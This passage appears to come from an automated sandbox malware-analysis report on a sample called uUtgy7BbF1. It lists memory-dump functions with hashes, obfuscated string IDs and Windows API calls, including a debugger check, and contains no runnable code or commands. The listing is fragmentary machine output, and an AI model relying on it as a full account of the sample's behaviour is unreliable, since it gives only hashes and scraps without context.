                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                  • String ID: `/j
                                                                                  • API String ID: 415426439-149791257
                                                                                  • Opcode ID: 328dd6a2b1554d81e0d682e3c2ca27ed7ec7f664fcf51241f58300f36b12ddf5
                                                                                  • Instruction ID: 1f11625f467105f7a2c4da350eb7f3cc8a1b4bd0c3a4209abb94980fbc59e351
                                                                                  • Opcode Fuzzy Hash: 328dd6a2b1554d81e0d682e3c2ca27ed7ec7f664fcf51241f58300f36b12ddf5
                                                                                  • Instruction Fuzzy Hash: 99517F71A00206AFFF10EFA5CC45AFE77BEAF45700F14452AE905E7691EBB09A40CB65
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #z*>$KJIH$M`af$M`af$TU$hi$xlc=
                                                                                  • API String ID: 0-3444116175
                                                                                  • Opcode ID: c0baef34677e044ab247d2e5aac73f80a096439048c6999c4bcee056cd6db3af
                                                                                  • Instruction ID: 7e836b9766b242f3fc3dd51180be0f2cab443d7991a9e66097dbc5a85011b6e9
                                                                                  • Opcode Fuzzy Hash: c0baef34677e044ab247d2e5aac73f80a096439048c6999c4bcee056cd6db3af
                                                                                  • Instruction Fuzzy Hash: 0BD14775609321CBC3149F18D85166FB3F1EF86314F444A2DF9D69B3A0EB789905CB8A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #z*>$KJIH$M`af$M`af$TU$hi$xlc=
                                                                                  • API String ID: 0-3444116175
                                                                                  • Opcode ID: 8636f7f2d492a3864e0f02ebe2bf5754de26b4778162c7e19092fcca7101ddf1
                                                                                  • Instruction ID: f976bc588ec640565c7012468651d5ffc8b69fa3d08ac8f64f271550ea2c12cc
                                                                                  • Opcode Fuzzy Hash: 8636f7f2d492a3864e0f02ebe2bf5754de26b4778162c7e19092fcca7101ddf1
                                                                                  • Instruction Fuzzy Hash: ADD13675609321CBC3149F18D85266FB3F1EF86314F444A2DF9D69B3A0EB789905CB8A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: KJIH$KJIH$xlc=$xlc=$xlc=$tz$x~
                                                                                  • API String ID: 0-1340891752
                                                                                  • Opcode ID: 63b6a7e1f9943a7ee3fba3336e57c65c80b2210d8cee09f5dd92498206add450
                                                                                  • Instruction ID: 4b9b57266fa6f88c6c86b47bd8eb3fb309f79ef555365d41f88ab1d7a07e1ec3
                                                                                  • Opcode Fuzzy Hash: 63b6a7e1f9943a7ee3fba3336e57c65c80b2210d8cee09f5dd92498206add450
                                                                                  • Instruction Fuzzy Hash: 77F16579A0C350DFD3248F55E88172BBBE1FBCA314F95482DEA859B351D7749802CB8A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BC$DTS^$SDTB$WLTO$no$sNDW$xlc=
                                                                                  • API String ID: 0-4261215005
                                                                                  • Opcode ID: ccdc102990b4c15d3359c4579d9af196d84240e8b5d2da791b71984c89447364
                                                                                  • Instruction ID: bc51c2f3923f1d1749b79aa7f72e467a3002caf565e53d3967ace05a6b2d116c
                                                                                  • Opcode Fuzzy Hash: ccdc102990b4c15d3359c4579d9af196d84240e8b5d2da791b71984c89447364
                                                                                  • Instruction Fuzzy Hash: F3D1F0B5A0C3908FD7309F24E8917ABB7F1EB96304F45482DE5C99B252DB748905CB8B
                                                                                  APIs
                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429149
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentExpandStrings
                                                                                  • String ID: zPf?$~Pf?
                                                                                  • API String ID: 237503144-2637493059
                                                                                  • Opcode ID: 26d119dec0a38fc1d7c433e7bb48d8e841ee7a0981e4bddc7203521b33e83297
                                                                                  • Instruction ID: 198dd5e36b7fe1fa964ce911b4fb16a36b701d1aa9f0cceef3b71a0ea0f726ca
                                                                                  • Opcode Fuzzy Hash: 26d119dec0a38fc1d7c433e7bb48d8e841ee7a0981e4bddc7203521b33e83297
                                                                                  • Instruction Fuzzy Hash: EB514675648305EFE3108F25AC81B6BB7A8FBC2704F50193DFA509B291DBB4D81ACB56
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00690198,00000002,00000000,?,?,?,00690198,?,00000000), ref: 00690860
                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00690198,00000002,00000000,?,?,?,00690198,?,00000000), ref: 00690889
                                                                                  • GetACP.KERNEL32(?,?,00690198,?,00000000), ref: 0069089E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 2299586839-711371036
                                                                                  • Opcode ID: ccdb9c462406461aba87eb86cd13be2b7448d104036ca815f827901d5dd59f6c
                                                                                  • Instruction ID: 5b08a86e6a71c174d02c4fff0a38dc5fbd137bc7324b51e5cff21faf262cb7ef
                                                                                  • Opcode Fuzzy Hash: ccdb9c462406461aba87eb86cd13be2b7448d104036ca815f827901d5dd59f6c
                                                                                  • Instruction Fuzzy Hash: 91219A22B40101AEFF349F54CB01AE773AFAF90B64B668024E90AD7A14E732DE41C7D0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: +$JSQC$J_\e$iWDB$klSm$wJsU
                                                                                  • API String ID: 0-48882314
                                                                                  • Opcode ID: 6b08c17d73f50599bc3423449fc688f48cd1f5fde1254425c14f9c76bad262bb
                                                                                  • Instruction ID: 6539de25e02be62e166c2d6d1fbf72afe4b3ae9106669352150e090de26398d0
                                                                                  • Opcode Fuzzy Hash: 6b08c17d73f50599bc3423449fc688f48cd1f5fde1254425c14f9c76bad262bb
                                                                                  • Instruction Fuzzy Hash: 1B72597090C3518FC725CF29C8406AFBBE1AF95314F188A6EE8E58B392D738D946C756
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: >j%h$C@$IG$YF$w
                                                                                  • API String ID: 0-3977256543
                                                                                  • Opcode ID: b1c41823cc40404da43d45bdcbf5a05d767afae4a0658e6817707d5df229ca96
                                                                                  • Instruction ID: bddec1b54a39677e85b17c04ceb6ad18fd944dcb43d24b0713774ccf1a2472f2
                                                                                  • Opcode Fuzzy Hash: b1c41823cc40404da43d45bdcbf5a05d767afae4a0658e6817707d5df229ca96
                                                                                  • Instruction Fuzzy Hash: A302107260C3408BD704DF69C8516ABFBE2EFD6314F09882DE4D58B392E7389545CB9A
                                                                                  APIs
                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00690E99
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFindFirst
                                                                                  • String ID:
                                                                                  • API String ID: 1974802433-0
                                                                                  • Opcode ID: 5c81cadf383f184be69c1e73d509d1f95bff1edf90b051f73de717d7e60cf764
                                                                                  • Instruction ID: 8d84d1b279ccf537d33fa7b291e57975aff00e86f32b8a591f28cd04fe91f618
                                                                                  • Opcode Fuzzy Hash: 5c81cadf383f184be69c1e73d509d1f95bff1edf90b051f73de717d7e60cf764
                                                                                  • Instruction Fuzzy Hash: A27101729451599FEF30AF28CC89AFEBBBEAF09300F1442DDE409A7611DA315E859F14
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0067E438
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0067E504
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0067E51D
                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0067E527
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                  • String ID:
                                                                                  • API String ID: 254469556-0
                                                                                  • Opcode ID: e37b6cf7a367214b9542d5ac71293e4a9b95f872178336ba03fc1dd7b2394aaf
                                                                                  • Instruction ID: 04d0eb133bafc9a296ec159a0cccd3b660463b56e89b2e4500560ef37ec0b859
                                                                                  • Opcode Fuzzy Hash: e37b6cf7a367214b9542d5ac71293e4a9b95f872178336ba03fc1dd7b2394aaf
                                                                                  • Instruction Fuzzy Hash: 1231E775D0121C9BDB20EFA5D9497CDBBB8AF08304F1041EAE40CAB250EBB19A858F45
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: 3wA$Oslm$L4$L4
                                                                                  • API String ID: 2994545307-2234767502
                                                                                  • Opcode ID: 82bf725f0757daa157f32e025d8a74b38d6c37187c90028344b6b4186a80b1bb
                                                                                  • Instruction ID: 307d0b6bb99e80c2126adcaddeb59da55b998df86b0f55e95dd8da5ebd5bfe2f
                                                                                  • Opcode Fuzzy Hash: 82bf725f0757daa157f32e025d8a74b38d6c37187c90028344b6b4186a80b1bb
                                                                                  • Instruction Fuzzy Hash: BFD147716083419FD724CF28C8817ABB7E2ABC6314F188A3DE4D983392D735D856CB86
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 7$WT$gfff
                                                                                  • API String ID: 0-3918836065
                                                                                  • Opcode ID: c1e1d21124b2e52469f7f82df4301e15a45ac8879c3b69de27b99dc034c8f0a4
                                                                                  • Instruction ID: b46a7ac6f51d3cab31650695944aba32df2089761ef6db5e6300506385caa733
                                                                                  • Opcode Fuzzy Hash: c1e1d21124b2e52469f7f82df4301e15a45ac8879c3b69de27b99dc034c8f0a4
                                                                                  • Instruction Fuzzy Hash: D8A13A73A106008FD318CA29CC517FBB7D3ABC5324F1AC63ED456CB2D9EA3898468785
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Ju$tu$w~
                                                                                  • API String ID: 0-2718015323
                                                                                  • Opcode ID: a8a042c75a796f11769dd960a33e4198fe42849cae9fa5f40045990e2e3e9ece
                                                                                  • Instruction ID: 3c52c23171b1d345c2d49e998851337e4974a2c3d886fd1ac3d2f2ae50b48a00
                                                                                  • Opcode Fuzzy Hash: a8a042c75a796f11769dd960a33e4198fe42849cae9fa5f40045990e2e3e9ece
                                                                                  • Instruction Fuzzy Hash: 6F41AA700093918BC724CF29C8606BBBBE0EF83364F04495DE5D28B291E3BD9945CB97
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: KJIH$xlc=$xlc=
                                                                                  • API String ID: 0-3693430147
                                                                                  • Opcode ID: ddcbebc37588f3223e6456a98ecf1037c94c59a38205b2405806e0036c004e6d
                                                                                  • Instruction ID: 1df2b0cd354e5eb9382eacdd7d6201147e9d1f654fc09427a9397325319c904e
                                                                                  • Opcode Fuzzy Hash: ddcbebc37588f3223e6456a98ecf1037c94c59a38205b2405806e0036c004e6d
                                                                                  • Instruction Fuzzy Hash: 4441F53AB69724DBC7289F59ECC152AF7E1EB99710F84543ED982DB311C728DC01878A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @gB$kim}
                                                                                  • API String ID: 0-565826954
                                                                                  • Opcode ID: b9771cc6a1c9dc5aa759e40e45813aeb6d2542078393295f4b3fb4169dc1c76f
                                                                                  • Instruction ID: 9883a33267a4edeb7d73dc9f2210c431252dad24f6d1f8ca6899b908e8f0c5d9
                                                                                  • Opcode Fuzzy Hash: b9771cc6a1c9dc5aa759e40e45813aeb6d2542078393295f4b3fb4169dc1c76f
                                                                                  • Instruction Fuzzy Hash: 1E225875E04265CFCB14CF68D8916AEBBB1EF49304F1980AED851AB352C739AD06CBD4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: p{-s$p{-s
                                                                                  • API String ID: 2994545307-716220686
                                                                                  • Opcode ID: 2aef8b8498d302ea470229f2b31964dafa280691521ba20ab2529de80153c117
                                                                                  • Instruction ID: f0c58c42614237375e365d72bc3c7a37cc96942c1005d0a9fe5c86925e2313ea
                                                                                  • Opcode Fuzzy Hash: 2aef8b8498d302ea470229f2b31964dafa280691521ba20ab2529de80153c117
                                                                                  • Instruction Fuzzy Hash: 48810435240601AFC728CB29CD92672B7E2EB8530871C8D7FD156D76A6D73DE8229B08
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: D]+\
                                                                                  • API String ID: 0-1174097187
                                                                                  • Opcode ID: 0d41e0e1d96c0d5275cbc1ccfd3832cd9580ac32bd5875f1c036d976f95b2d15
                                                                                  • Instruction ID: 9251f9772932f48160a5ade6cb9760e2072f5487641182bc89e2b62d99dc5cf9
                                                                                  • Opcode Fuzzy Hash: 0d41e0e1d96c0d5275cbc1ccfd3832cd9580ac32bd5875f1c036d976f95b2d15
                                                                                  • Instruction Fuzzy Hash: C45224B9A18200ABD714DF14D84167BB7E1FBD6314F19892EE88197391D73CEC41CB9A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: z
                                                                                  • API String ID: 2994545307-1657960367
                                                                                  • Opcode ID: c7a99f6c6c6413b9328a1f415840cf05a1af755a24bae09dd66a052c86edf477
                                                                                  • Instruction ID: a41510cab639ff2c168ed1a461397d8e6c98ec91fc98b876038bb987118f98da
                                                                                  • Opcode Fuzzy Hash: c7a99f6c6c6413b9328a1f415840cf05a1af755a24bae09dd66a052c86edf477
                                                                                  • Instruction Fuzzy Hash: 7FD12934A083409FD724CF2598907BBB7E2EBDA314F19592EE0D657291C738D847CB5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: 056w
                                                                                  • API String ID: 2994545307-3031594284
                                                                                  • Opcode ID: d41cf2aced06695c6dce53ea779f2bf54988cbc4b145618bc2f0dedb8f096e31
                                                                                  • Instruction ID: 1e524d56f986b60e63968127200a34d937c12baad4a8d406414dac60ed768612
                                                                                  • Opcode Fuzzy Hash: d41cf2aced06695c6dce53ea779f2bf54988cbc4b145618bc2f0dedb8f096e31
                                                                                  • Instruction Fuzzy Hash: C0C17A72A083005BD3249E24CCC277BB7A2EBCA314F18A52ED59557391D6BCDC46C79A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: \l
                                                                                  • API String ID: 0-332606932
                                                                                  • Opcode ID: 2dec8be2b520b2186125d96ced5c0adb923a6fa7d4cda33570fed64b2fe6fc8e
                                                                                  • Instruction ID: 852c598ae3c60e65e129f9c36e5a4a5eb34ebc179e5d94f45104046a45fe5565
                                                                                  • Opcode Fuzzy Hash: 2dec8be2b520b2186125d96ced5c0adb923a6fa7d4cda33570fed64b2fe6fc8e
                                                                                  • Instruction Fuzzy Hash: E7B18D72A143209BD7249F24AC82677B3B1EFA1314F99852EECC557351E23CEC05C79A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: _
                                                                                  • API String ID: 0-701932520
                                                                                  • Opcode ID: c3dfae79088f6faf2fd2d7b366d4b356a6ca7e7aafd60081d9beaeb1768c1e58
                                                                                  • Instruction ID: 2874f46035bf117a80d7d2a23349d9cb71d49021efdfc033c4a59cdebb79e407
                                                                                  • Opcode Fuzzy Hash: c3dfae79088f6faf2fd2d7b366d4b356a6ca7e7aafd60081d9beaeb1768c1e58
                                                                                  • Instruction Fuzzy Hash: 86B1F77560C3408BD7258F2898617FBBBF2ABDA314F28497ED4C687382D7389851875A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: /4-"
                                                                                  • API String ID: 2994545307-255669811
                                                                                  • Opcode ID: f4558d96d5aa098eeacb25ccd83ed2fcdbbf09adccc6b57ad2e83dd542a83ca3
                                                                                  • Instruction ID: 5d47b2a4792fb15c73dd9788517ba42da93c73d11f813630f87d1316b5251ac7
                                                                                  • Opcode Fuzzy Hash: f4558d96d5aa098eeacb25ccd83ed2fcdbbf09adccc6b57ad2e83dd542a83ca3
                                                                                  • Instruction Fuzzy Hash: B8913835604311AFE720DF28C88066BB7E2EFD4750F19852DEA815B395DB39EC62C785
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: c`^Z
                                                                                  • API String ID: 0-4018570465
                                                                                  • Opcode ID: 9eaaeac1af0046f77bfdce008b90eb0f0d12110f4699f489367c40e366593788
                                                                                  • Instruction ID: 84572387e2f9d8e30e4a59fcb4903cfd6437d21f2140ce11b4878cf53556221a
                                                                                  • Opcode Fuzzy Hash: 9eaaeac1af0046f77bfdce008b90eb0f0d12110f4699f489367c40e366593788
                                                                                  • Instruction Fuzzy Hash: DA513576A0C3A18BC335CF3998903E7BBE2AF96704F58896EC4C99B205DA3845058786
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: c`^Z
                                                                                  • API String ID: 0-4018570465
                                                                                  • Opcode ID: d783b575065614c62e39edefdac40061046f0ec8c49e4bcc71ff719ed9c249e9
                                                                                  • Instruction ID: 62403507b67e3add205e3cb6eb23e8c84b81608dc76150191bd4437fa6a5d6a1
                                                                                  • Opcode Fuzzy Hash: d783b575065614c62e39edefdac40061046f0ec8c49e4bcc71ff719ed9c249e9
                                                                                  • Instruction Fuzzy Hash: 8241477061C3D18BD735CF3994903E7BBE1EB97700F68896DC0C987246DB3844068B96
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: KI
                                                                                  • API String ID: 0-1977173829
                                                                                  • Opcode ID: 9817d8d2cd989187cfd65775c6c2d6774b5ae1b7bccca7278f7fa6d8ef7e6c81
                                                                                  • Instruction ID: 91a34f79fce4890eca5ccf24ac22c1236428951ee7d79aa7463c0d4d2c87feab
                                                                                  • Opcode Fuzzy Hash: 9817d8d2cd989187cfd65775c6c2d6774b5ae1b7bccca7278f7fa6d8ef7e6c81
